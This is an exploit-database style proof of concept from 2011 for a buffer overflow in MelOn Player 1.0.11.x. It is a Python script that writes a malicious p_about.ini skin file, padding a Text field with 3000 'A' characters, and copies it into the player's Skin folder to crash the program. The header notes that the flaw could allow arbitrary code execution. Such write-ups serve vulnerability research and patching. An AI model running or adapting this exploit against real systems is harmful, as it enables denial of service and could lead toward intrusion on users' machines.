# Exploit Title: MelOn Player 1.0.11.x Denial of Service POC
# Date: 09/09/2011
# Author: modpr0be
# Software Link: http://www.melon.co.id/cs/guide/download/player.do
# Vulnerable version: 1.0.11.x
# Tested on: Windows XP SP3 (VirtualBox 4.1.0 r73009)
# CVE : N/A
# Thanks: offsec, exploit-db, corelan-team, 5M7X, loneferret, mr_me, _sinner

#### Software description:
# Melon Player is a famous software in Indonesia to play songs that are provided by 
# the Melon portal (http://www.melon.co.id). This software can play any music 
# file types such as mp3, wav, wma, mp4, and others. This player can also play 
# the files on your local computer or by online streaming to the portal Melon. 
# The songs can also be downloaded to your local computer.
#
#### Vulnerable information:
# The main program (IDMelonPlayer.exe) suffers from a buffer overflow vulnerability 
# when opening p_about.ini file (Note: Actually, p_about.ini is a configuration file 
# as part of skin template. This file will bring the program information and can be 
# accessed on the menu (Menu → Information)), as a result of adding extra bytes to 
# parts of the file (Text section), giving the attackers possibility to run an arbitrary 
# code execution on the system that install Melon Player.
#
### Some Conditions:
# This is just the POC, it will just crash the program.
# and it's unicode ;)
#
##

#!/usr/bin/python

import os,sys,shutil,time

header=("""[MAIN]
MainStyle=SKIN
Resize=NO
Mask=YES
BGStyle=IMAGE
DefSize=0,0,427,136
Image=skin.bmp
Button=2
Slider=
Static=1
Text=4
Edit=
Combo=


[MAINBG]
TopLeft=145,389,6,21
TopCenter=153,389,11,21
TopRight=166,389,6,21
MiddleLeft=145,412,6,21
MiddleCenter=153,412,11,21
MiddleRight=166,412,6,21
BottomLeft=145,435,6,34
BottomCenter=153,435,11,34
BottomRight=166,435,6,34

[MAINMASK]
TopLeft=174,389,10,10
TopCenter=185,389,10,10
TopRight=196,389,10,10
MiddleLeft=185,389,10,10
MiddleCenter=185,389,10,10
MiddleRight=185,389,10,10
BottomLeft=174,400,10,10
BottomCenter=185,389,10,10
BottomRight=196,400,10,10


[BUTTON_1]
Name=??
ID=1001
ResizeStyle=TOP_LEFT
Tooltip=
CheckBox=FALSE
Position=410,4,13,13
NormalRect=223,389,13,13
OverRect=238,389,13,13
DownRect=253,389,13,13
DisabledRect=223,389,13,13
MaskRect=2000,0,13,13

[BUTTON_2]
Name=??
ID=1002
ResizeStyle=TOP_LEFT
Tooltip=
CheckBox=FALSE
Position=173,105,80,20
NormalRect=0,763,80,20
OverRect=0,763,80,20
DownRect=81,763,80,20
DisabledRect=162,763,80,20
MaskRect=2000,0,80,20


[STATIC_1]
Name=???_??
ID=2001
Position=20,31,72,84
TopLeft=14,478,72,84
TopCenter=
TopRight=
MiddleLeft=
MiddleCenter=
MiddleRight=
BottomLeft=
BottomCenter=
BottomRight=


[TEXT_1]
Name=popup Name sdw
ID=3701
Position=2,2,420,14
Text=MelOn Player
Font=Arial
FontSize=12
FontBold=
Align=CENTER
FontColor=0,0,0
""")

footer=("""
[TEXT_3]
Name=????
ID=3703
Position=104,50,243,14
Text=Melon Player Version 1.0.0.101102
Font=Arial
FontSize=12
FontBold=
Align=
FontColor=0,0,0

[TEXT_4]
Name=Copyright
ID=3704
Position=104,72,303,14
Text=Copyright PT. Melon Indonesia. All Right Reserved.
Font=Arial
FontSize=12
FontBold=
Align=
FontColor=0,0,0
""")

filename="p_about.ini"
splash=os.path.abspath(filename)
skindir="C:\Program Files\MelonPlayerID\Skin"

junk = "A" * 3000

buggy=("""
[TEXT_2]
Name=popup Name
ID=3702
Position=3,3,420,14
Text="""+junk+ """
Font=Arial
FontSize=12
FontBold=
Align=CENTER
FontColor=170,170,170\r\n""")

banner=("""
[*] MelOnPlayer 1.0.11.x Denial of Service POC
[*] modpr0be[at]spentera[dot]com.
[*] thanks a lot: cyb3r.anbu | otoy :)
=====================================================
""")

file=open(filename,'w')
if os.name == 'nt':
	if os.path.isdir(skindir):
		try:
			file.write(header+buggy+footer)
			print banner
			print "[*] Creating the malicious .ini file.."
			time.sleep(2)
			print "[*] Malicious file (POC)",filename,"created.."
			print "[*] Path:",splash
			file.close()
			shutil.copy2(splash,skindir)
			print "[*] File",filename,"has been copied to",skindir
		except IOError:
			print "[-] Could not write to destination folder, check permission.."
			sys.exit()
	else:
		print "[-] Could not find Skin directory, is MelOn Player installed?"
		sys.exit()
else:
	print "[-] Please run this script on Windows."
	sys.exit()